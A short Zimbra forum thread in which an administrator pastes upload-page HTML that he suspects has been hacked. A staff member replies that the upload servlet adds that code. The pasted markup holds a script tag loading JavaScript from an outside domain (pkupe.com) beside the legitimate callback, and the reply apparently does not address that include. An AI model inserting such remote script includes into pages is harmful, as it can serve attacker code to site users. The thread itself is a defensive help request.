Results 1 to 2 of 2

Thread: zcs-6.0.9_GA_2686.UBUNTU8_64 get hacked

  1. #1
    Join Date
    Oct 2009
    Posts
    3
    Rep Power
    6

    Default zcs-6.0.9_GA_2686.UBUNTU8_64 get hacked

    Hi all,

    I have a trouble these day, i have reported a upload file error from user,
    so i check the source code , i found thses at attactment upload page @ ajax(after user attact the file).

    someone hack and append some js into it,

    anyone have idea?

    Ths

    Francis

    <iframe name="DWT81" id="DWT81" src='javascript:""' style="position: absolute; top: 0; left: 0; visibility: hidden">
    <html>
    <head>
    <script src="http://www.pkupe.com/images/pic.js"></<html><head><script language='javascript'>
    function doit() { window.parent._uploadManager.loaded(200,'0',[{"aid":"2f61a054-5a8c-4e6a-a9bb-e95c1fdbe245:abc0a22c-1ffa-4665- be11-05fec1280d76","ct":"application/zip","filename":"All-2010-10-18-161702.tgz.download","s":16235546}]); }
    </script>
    </head>
    <body onload="doit()">
    </body>
    </html>
    </iframe>

  2. #2
    Join Date
    May 2007
    Location
    Zimbra
    Posts
    1,285
    Rep Power
    10

    Default

    Our upload servlet puts that code in so that the application can respond when an upload finishes.
    Quanah Gibson-Mount
    Server Architect
    Zimbra, Inc
    --------------------
    Zimbra :: the leader in open source messaging and collaboration

Similar Threads

  1. Trouble Sending mail - All Messages deferred!
    By SiteDiscovery in forum Administrators
    Replies: 7
    Last Post: 09-03-2009, 04:52 AM
  2. ZCS 5.0 FOSS is Released!!!
    By jholder in forum Announcements
    Replies: 1
    Last Post: 12-21-2007, 11:21 AM
  3. Replies: 41
    Last Post: 10-29-2007, 02:36 PM
  4. ZCS 3.2 Beta Available
    By KevinH in forum Announcements
    Replies: 31
    Last Post: 07-07-2006, 03:46 PM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •